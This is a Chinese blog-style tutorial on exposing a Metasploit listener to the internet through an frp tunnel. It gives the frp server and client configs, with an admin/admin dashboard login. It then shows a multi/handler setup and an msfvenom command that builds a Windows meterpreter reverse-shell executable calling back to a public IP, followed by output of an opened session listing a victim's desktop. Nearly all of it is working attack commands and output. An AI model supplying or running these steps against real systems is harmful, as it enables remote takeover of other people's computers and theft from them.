0
点赞
收藏
分享

微信扫一扫

内网Metasploit映射到外网

穆风1818 2022-09-28 阅读 121

下载frp

Github项目地址:https://github.com/fatedier/frp

找到最新的releases下载,系统版本自行确认。

下载方法:

wget https://github.com/fatedier/frp/releases/download/v0.16.1/frp_0.16.1_linux_amd64.tar.gz
tar zxvf frp_0.16.1_linux_amd64.tar.gz
cd frp_0.16.1_linux_amd64

 

公网服务器配置:

修改配置文件:

[yuyongxr@instance-2 frp_0.16.1_linux_amd64]$ vim frps.ini 
[common]
bind_port = 7000
dashboard_port = 7500
dashboard_user = admin
dashboard_pwd = admin

启动服务:

[yuyongxr@instance-2 frp_0.16.1_linux_amd64]$ nohup ./frps -c frps.ini > log.txt &

 

kali linux 配置:

修改配置文件:

kali@kali:~/frp_0.16.1_linux_amd64$ vim frpc.ini 
[common]
server_addr = xx.xx.xx.xx
server_port = 7000

[msf]
type = tcp
local_ip = 127.0.0.1
local_port = 6666
remote_port = 4446

启动服务:

kali@kali:~/frp_0.16.1_linux_amd64$ nohup ./frpc -c frpc.ini > log.txt &

metasploit配置:

msf5 > use exploit/multi/handler 
msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 127.0.0.1
lhost => 127.0.0.1
msf5 exploit(multi/handler) > set lport 6666
lport => 6666

生成payload文件:

e2a5e@kali:~$ msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=34.80.29.48 lport=4446 -f exe -o test.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 510 bytes
Final size of exe file: 7168 bytes
Saved as: test.exe

执行payload文件,测试效果:

msf5 exploit(multi/handler) > exploit 

[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[*] Started reverse TCP handler on 127.0.0.1:6666
[*] Sending stage (206403 bytes) to 127.0.0.1
[*] Meterpreter session 1 opened (127.0.0.1:6666 -> 127.0.0.1:35992) at 2019-09-03 17:05:39 +0800

meterpreter > ls
Listing: C:\Users\win7\Desktop
==============================

Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100666/rw-rw-rw- 2309 fil 2019-08-30 11:12:41 +0800 Google Chrome.lnk
100777/rwxrwxrwx 10916080 fil 2019-08-30 11:57:01 +0800 PCHunter64.exe
40777/rwxrwxrwx 0 dir 2019-09-03 16:12:02 +0800 PanDownload
100666/rw-rw-rw- 282 fil 2018-09-11 09:18:55 +0800 desktop.ini
100777/rwxrwxrwx 7168 fil 2019-09-03 16:39:18 +0800 test.exe

meterpreter >

 



举报

相关推荐

0 条评论